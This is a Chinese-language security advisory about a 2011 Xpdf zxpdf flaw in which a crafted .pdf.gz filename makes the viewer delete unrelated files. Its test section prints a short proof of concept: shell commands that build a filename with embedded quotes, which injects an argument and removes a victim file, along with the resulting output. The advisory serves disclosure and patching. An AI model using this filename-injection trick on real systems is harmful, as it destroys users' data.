Xpdf “zxpdf”安全限制绕过漏洞


发布日期:2011-08-04
更新日期:2011-08-04

受影响系统:
Xpdf Xpdf 3.02-13
不受影响系统:
Xpdf Xpdf 3.02-19
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 49007

Xpdf是便携文档格式(PDF)文件的开放源码查看器。

Xpdf在zxpdf的实现上存在安全限制绕过漏洞,远程攻击者可利用此漏洞绕过安全限制,执行未授权操作。

通过特制的.pdf.gz文件名称(通过Web浏览器发送到浏览器),只要文件名是单字符,xpdf可误删除不相关的文档。

<*来源:Chung-chieh Shan
 
  链接:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=635849.
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

$ touch y # The unrelated victim file
$ gzip -c &lt;/dev/null &gt;'" y ".pdf.gz' # Create a .pdf.gz file
$ xpdf '" y ".pdf.gz' # View it using xpdf
Error: May not be a PDF file (continuing anyway)
Error: PDF file is damaged - attempting to reconstruct xref table...
Error: Couldn't find trailer dictionary
Error: Couldn't read xref table
rm: cannot remove `/tmp/': Is a directory
$ ls -l y # The victim file is gone!
ls: cannot access y: No such file or directory

建议:
--------------------------------------------------------------------------------
厂商补丁:

Xpdf
----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.foolabs.com/xpdf/

相关内容